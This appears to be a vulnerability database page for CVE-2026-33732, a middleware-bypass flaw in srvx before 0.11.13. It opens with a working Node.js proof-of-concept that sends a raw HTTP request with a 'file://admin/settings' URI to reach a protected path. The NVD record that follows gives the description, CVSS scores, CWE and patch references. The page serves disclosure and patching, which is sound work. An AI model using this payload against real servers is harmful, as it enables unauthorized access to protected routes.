CVE-2026-33732

// PoC for CVE-2026-33732: srvx Middleware Bypass // Target: srvx < 0.11.13 on Node.js adapter // Description: Sending a raw HTTP request with a non-standard scheme bypasses middleware. const net = require('net'); const host = '127.0.0.1'; const port = 3000; // Default srvx port // Malicious payload using 'file://' scheme to trigger FastURL parsing issue const payload = `GET file://admin/settings HTTP/1.1\r\n` + `Host: ${host}\r\n` + `Connection: close\r\n\r\n`; const client = new net.Socket(); client.connect(port, host, () => { console.log('[*] Sending payload to bypass middleware...'); client.write(payload); }); client.on('data', (data) => { console.log('[+] Response received:'); console.log(data.toString()); client.destroy(); }); client.on('error', (err) => { console.error('[-] Connection error:', err.message); });

{"cve": {"id": "CVE-2026-33732", "sourceIdentifier": "[email protected]", "published": "2026-03-26T18:16:31.430", "lastModified": "2026-04-02T18:41:11.220", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "srvx is a universal server based on web standards. Prior to version 0.11.13, a pathname parsing discrepancy in srvx's `FastURL` allows middleware bypass on the Node.js adapter when a raw HTTP request uses an absolute URI with a non-standard scheme (e.g. `file://`). Starting in version 0.11.13, the `FastURL` constructor now deopts to native `URL` for any string not starting with `/`, ensuring consistent pathname resolution."}, {"lang": "es", "value": "srvx es un servidor universal basado en estándares web. Antes de la versión 0.11.13, una discrepancia en el análisis de rutas en el 'FastURL' de srvx permite la omisión de middleware en el adaptador de Node.js cuando una solicitud HTTP sin procesar utiliza una URI absoluta con un esquema no estándar (por ejemplo, 'file://'). A partir de la versión 0.11.13, el constructor 'FastURL' ahora recurre a la 'URL' nativa para cualquier cadena que no comience con '/', asegurando una resolución de rutas consistente."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-706"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:h3:srvx:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "0.11.13", "matchCriteriaId": "B8FAD178-5888-4A2F-B296-86871B71B721"}]}]}], "references": [{"url": "https://github.com/h3js/h3/security/advisories/GHSA-p36q-q72m-gchr", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/h3js/srvx/commit/de0d69901c357f36a39b7e13eebef6c930652baa", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/h3js/srvx/releases/tag/v0.11.13", "source": "[email protected]", "tags": ["Release Notes"]}]}}